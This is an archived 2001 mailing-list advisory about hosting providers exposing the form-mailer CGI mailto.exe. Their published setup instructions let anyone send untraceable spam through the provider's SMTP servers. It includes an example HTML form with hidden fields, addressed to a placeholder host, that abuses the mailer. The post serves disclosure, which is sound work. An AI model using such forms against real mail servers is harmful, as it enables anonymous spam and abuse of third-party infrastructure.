Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Date: Mon Dec 10 2001 - 17:40:25 CST
Monday, December 10, 2001
Forget about open relays. There is an extremely simple mailto form
application called mailto.exe available on the internet. Simply create your
html form, upload the mailto.exe into your cgi bin and fire away.
The problem is, as a courtesy, many ISP's or hosting companies or providers
of other web site 'things' give their clients, in painful detail,
instructions on how to install and use this mailto.exe application.
The BIG problem is that these instructions include the provider's settings
including their smtp server name, and full path name to their directory
containing mailto.exe and it actually works !
<FORM ACTION="http://WWW.MALWARE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST">
<INPUT TYPE="hidden" NAME="sendto" VALUE=billgbloatedcorp.com>
<INPUT TYPE="hidden" NAME="email" VALUE="hotsuezzzxxxxxxrated.com">
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.malware.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE=http://ww.malware.com>
Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>
Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is
This can be inputted from any desktop html editor / viewer and emails can be
fired away. Because it is located on the provider's site (within their
domain), the smtp servers work and all IP addresses are theirs. In other
words, unlike a relay which can reveal the originating IP address, this
provides for none of that.
Trivial searching with our favorite engine, reveals 2 immediate, fully
functional provider's instruction including all their details, which work
exactly as described. No doubt deep searching will yield many many more.
Notes: there does not seem to be a single solution, other than to release
this and urge any and all providers, hosting services, other to be aware
and remove or certainly not give your working server details.
______________________________________________________________________________ Send a friend your Buddy Card and stay in contact always with Excite Messenger http://messenger.excite.com